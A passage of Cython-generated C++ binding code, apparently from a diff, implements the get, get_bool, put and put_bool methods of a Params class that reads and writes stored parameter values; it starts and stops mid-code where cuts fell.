*__pyx_pf_6common_10params_pyx_6Params_8get(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key, bool __pyx_v_block, PyObject *__pyx_v_encoding) { + std::string __pyx_v_k; + std::string __pyx_v_val; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + std::string __pyx_t_5; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get", 0); + + /* "common/params_pyx.pyx":56 + * + * def get(self, key, bool block=False, encoding=None): + * cdef string k = self.check_key(key) # <<<<<<<<<<<<<< + * cdef string val + * with nogil: + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_check_key); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 56, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_key}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 56, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_t_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 56, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_k = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_5); + + /* "common/params_pyx.pyx":58 + * cdef string k = self.check_key(key) + * cdef string val + * with nogil: # <<<<<<<<<<<<<< + * val = self.p.get(k, block) + * + */ + { + #ifdef WITH_THREAD + PyThreadState *_save; + _save = NULL; + Py_UNBLOCK_THREADS + __Pyx_FastGIL_Remember(); + #endif + /*try:*/ { + + /* "common/params_pyx.pyx":59 + * cdef string val + * with nogil: + * val = self.p.get(k, block) # <<<<<<<<<<<<<< + * + * if val == b"": + */ + __pyx_v_val = __pyx_v_self->p->get(__pyx_v_k, __pyx_v_block); + } + + /* "common/params_pyx.pyx":58 + * cdef string k = self.check_key(key) + * cdef string val + * with nogil: # <<<<<<<<<<<<<< + * val = self.p.get(k, block) + * + */ + /*finally:*/ { + /*normal exit:*/{ + #ifdef WITH_THREAD + __Pyx_FastGIL_Forget(); + Py_BLOCK_THREADS + #endif + goto __pyx_L5; + } + __pyx_L5:; + } + } + + /* "common/params_pyx.pyx":61 + * val = self.p.get(k, block) + * + * if val == b"": # <<<<<<<<<<<<<< + * if block: + * # If we got no value while running in blocked mode + */ + __pyx_t_6 = (__pyx_v_val == ((char const *)"")); + if (__pyx_t_6) { + + /* "common/params_pyx.pyx":62 + * + * if val == b"": + * if block: # <<<<<<<<<<<<<< + * # If we got no value while running in blocked mode + * # it means we got an interrupt while waiting + */ + __pyx_t_6 = (__pyx_v_block != 0); + if (unlikely(__pyx_t_6)) { + + /* "common/params_pyx.pyx":65 + * # If we got no value while running in blocked mode + * # it means we got an interrupt while waiting + * raise KeyboardInterrupt # <<<<<<<<<<<<<< + * else: + * return None + */ + __Pyx_Raise(__pyx_builtin_KeyboardInterrupt, 0, 0, 0); + __PYX_ERR(0, 65, __pyx_L1_error) + + /* "common/params_pyx.pyx":62 + * + * if val == b"": + * if block: # <<<<<<<<<<<<<< + * # If we got no value while running in blocked mode + * # it means we got an interrupt while waiting + */ + } + + /* "common/params_pyx.pyx":67 + * raise KeyboardInterrupt + * else: + * return None # <<<<<<<<<<<<<< + * + * return val if encoding is None else val.decode(encoding) + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + } + + /* "common/params_pyx.pyx":61 + * val = self.p.get(k, block) + * + * if val == b"": # <<<<<<<<<<<<<< + * if block: + * # If we got no value while running in blocked mode + */ + } + + /* "common/params_pyx.pyx":69 + * return None + * + * return val if encoding is None else val.decode(encoding) # <<<<<<<<<<<<<< + * + * def get_bool(self, key, bool block=False): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_6 = (__pyx_v_encoding == Py_None); + if (__pyx_t_6) { + __pyx_t_2 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_v_val); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 69, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __pyx_t_2; + __pyx_t_2 = 0; + } else { + __pyx_t_3 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_v_val); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 69, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_decode); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 69, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_7))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_7); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_7); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_7, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_encoding}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_7, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 69, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + } + __pyx_t_1 = __pyx_t_2; + __pyx_t_2 = 0; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/params_pyx.pyx":55 + * return key + * + * def get(self, key, bool block=False, encoding=None): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * cdef string val + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("common.params_pyx.Params.get", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":71 + * return val if encoding is None else val.decode(encoding) + * + * def get_bool(self, key, bool block=False): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * cdef bool r + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_11get_bool(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_11get_bool = {"get_bool", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_11get_bool, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_11get_bool(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_key = 0; + bool __pyx_v_block; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_bool (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_key,&__pyx_n_s_block,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_key)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 71, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_block); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 71, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "get_bool") < 0)) __PYX_ERR(0, 71, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_key = values[0]; + if (values[1]) { + __pyx_v_block = __Pyx_PyObject_IsTrue(values[1]); if (unlikely((__pyx_v_block == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 71, __pyx_L3_error) + } else { + __pyx_v_block = ((bool)0); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("get_bool", 0, 1, 2, __pyx_nargs); __PYX_ERR(0, 71, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.Params.get_bool", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_10get_bool(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self), __pyx_v_key, __pyx_v_block); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_10params_pyx_6Params_10get_bool(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key, bool __pyx_v_block) { + std::string __pyx_v_k; + bool __pyx_v_r; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + std::string __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_bool", 0); + + /* "common/params_pyx.pyx":72 + * + * def get_bool(self, key, bool block=False): + * cdef string k = self.check_key(key) # <<<<<<<<<<<<<< + * cdef bool r + * with nogil: + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_check_key); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_key}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_t_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_k = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_5); + + /* "common/params_pyx.pyx":74 + * cdef string k = self.check_key(key) + * cdef bool r + * with nogil: # <<<<<<<<<<<<<< + * r = self.p.getBool(k, block) + * return r + */ + { + #ifdef WITH_THREAD + PyThreadState *_save; + _save = NULL; + Py_UNBLOCK_THREADS + __Pyx_FastGIL_Remember(); + #endif + /*try:*/ { + + /* "common/params_pyx.pyx":75 + * cdef bool r + * with nogil: + * r = self.p.getBool(k, block) # <<<<<<<<<<<<<< + * return r + * + */ + __pyx_v_r = __pyx_v_self->p->getBool(__pyx_v_k, __pyx_v_block); + } + + /* "common/params_pyx.pyx":74 + * cdef string k = self.check_key(key) + * cdef bool r + * with nogil: # <<<<<<<<<<<<<< + * r = self.p.getBool(k, block) + * return r + */ + /*finally:*/ { + /*normal exit:*/{ + #ifdef WITH_THREAD + __Pyx_FastGIL_Forget(); + Py_BLOCK_THREADS + #endif + goto __pyx_L5; + } + __pyx_L5:; + } + } + + /* "common/params_pyx.pyx":76 + * with nogil: + * r = self.p.getBool(k, block) + * return r # <<<<<<<<<<<<<< + * + * def put(self, key, dat): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBool_FromLong(__pyx_v_r); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 76, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/params_pyx.pyx":71 + * return val if encoding is None else val.decode(encoding) + * + * def get_bool(self, key, bool block=False): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * cdef bool r + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("common.params_pyx.Params.get_bool", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":78 + * return r + * + * def put(self, key, dat): # <<<<<<<<<<<<<< + * """ + * Warning: This function blocks until the param is written to disk! + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_13put(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_6common_10params_pyx_6Params_12put, "\n Warning: This function blocks until the param is written to disk!\n In very rare cases this can take over a second, and your code will hang.\n Use the put_nonblocking helper function in time sensitive code, but\n in general try to avoid writing params as much as possible.\n "); +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_13put = {"put", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_13put, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_6common_10params_pyx_6Params_12put}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_13put(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_key = 0; + PyObject *__pyx_v_dat = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("put (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_key,&__pyx_n_s_dat,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_key)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 78, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dat)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 78, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("put", 1, 2, 2, 1); __PYX_ERR(0, 78, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "put") < 0)) __PYX_ERR(0, 78, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_key = values[0]; + __pyx_v_dat = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("put", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 78, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.Params.put", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_12put(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self), __pyx_v_key, __pyx_v_dat); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_10params_pyx_6Params_12put(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key, PyObject *__pyx_v_dat) { + std::string __pyx_v_k; + std::string __pyx_v_dat_bytes; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + std::string __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("put", 0); + + /* "common/params_pyx.pyx":85 + * in general try to avoid writing params as much as possible. + * """ + * cdef string k = self.check_key(key) # <<<<<<<<<<<<<< + * cdef string dat_bytes = ensure_bytes(dat) + * with nogil: + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_check_key); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 85, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_key}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 85, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_t_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 85, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_k = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_5); + + /* "common/params_pyx.pyx":86 + * """ + * cdef string k = self.check_key(key) + * cdef string dat_bytes = ensure_bytes(dat) # <<<<<<<<<<<<<< + * with nogil: + * self.p.put(k, dat_bytes) + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_ensure_bytes); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 86, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_dat}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 86, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_t_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 86, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_dat_bytes = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_5); + + /* "common/params_pyx.pyx":87 + * cdef string k = self.check_key(key) + * cdef string dat_bytes = ensure_bytes(dat) + * with nogil: # <<<<<<<<<<<<<< + * self.p.put(k, dat_bytes) + * + */ + { + #ifdef WITH_THREAD + PyThreadState *_save; + _save = NULL; + Py_UNBLOCK_THREADS + __Pyx_FastGIL_Remember(); + #endif + /*try:*/ { + + /* "common/params_pyx.pyx":88 + * cdef string dat_bytes = ensure_bytes(dat) + * with nogil: + * self.p.put(k, dat_bytes) # <<<<<<<<<<<<<< + * + * def put_bool(self, key, bool val): + */ + (void)(__pyx_v_self->p->put(__pyx_v_k, __pyx_v_dat_bytes)); + } + + /* "common/params_pyx.pyx":87 + * cdef string k = self.check_key(key) + * cdef string dat_bytes = ensure_bytes(dat) + * with nogil: # <<<<<<<<<<<<<< + * self.p.put(k, dat_bytes) + * + */ + /*finally:*/ { + /*normal exit:*/{ + #ifdef WITH_THREAD + __Pyx_FastGIL_Forget(); + Py_BLOCK_THREADS + #endif + goto __pyx_L5; + } + __pyx_L5:; + } + } + + /* "common/params_pyx.pyx":78 + * return r + * + * def put(self, key, dat): # <<<<<<<<<<<<<< + * """ + * Warning: This function blocks until the param is written to disk! + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("common.params_pyx.Params.put", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":90 + * self.p.put(k, dat_bytes) + * + * def put_bool(self, key, bool val): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * with nogil: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_15put_bool(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_15put_bool = {"put_bool", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_15put_bool, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_15put_bool(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_key = 0; + bool __pyx_v_val; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("put_bool (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_key,&__pyx_n_s_val,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_key)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 90, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_val)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 90, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("put_bool", 1, 2, 2, 1); __PYX_ERR(0, 90, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "put_bool") < 0)) __PYX_ERR(0, 90, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 